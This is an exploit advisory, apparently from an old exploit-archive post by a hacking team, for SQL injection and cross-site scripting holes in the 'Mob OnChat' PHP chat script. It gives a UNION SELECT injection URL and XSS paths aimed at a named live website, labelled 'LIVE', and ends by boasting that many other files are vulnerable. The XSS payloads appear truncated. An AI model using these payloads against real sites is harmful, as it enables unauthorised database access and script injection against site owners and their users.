########################################################################### #-----------------------------I AM MUSLIM !!------------------------------# ########################################################################### ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== [ť] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!] ============================================================================== [ť] Mob OnChat (SQL/XSS) Multiple Remote Vulnerabilities ============================================================================== [ť] Script: [ Mob Games ] [ť] Language: [ PHP ] [ť] Download: [ http://www.mobpartner.com/services/chat/ ] [ť] Team: [ EvilWay ] [ť] Dork: [ OFF ] [ť] Price: [ FREE ] [ť] Founder: [ Moudi ] [ť] Thanks to: [ MiZoZ , ZuKa , str0ke , 599eme Man , Security-Shell ] [ť] Site : [ http://security-shell.ws/forum.php ] ########################################################################### ===[ Exploit + LIVE : SQL INJECTION vulnerability ]=== [ť] http://www.site.com/patch/chat.php?id=[SQL] [ť] http://gowireless.onchat.mobi/chat.php?id=null+union+select+1,version(),3,4,5,6-- ===[ Exploit XSS + LIVE : vulnerability ]=== [ť] http://www.site.com/patch/plateform/login.php/[XSS] [ť] http://www.site.com/patch/report.php/[NB] [ť] http://gowireless.onchat.mobi/plateform/login.php/>"> [ť] http://gowireless.onchat.mobi/plateform/login.php/report.php/>"> Note: many many others files are infected too :) Author: Moudi ###########################################################################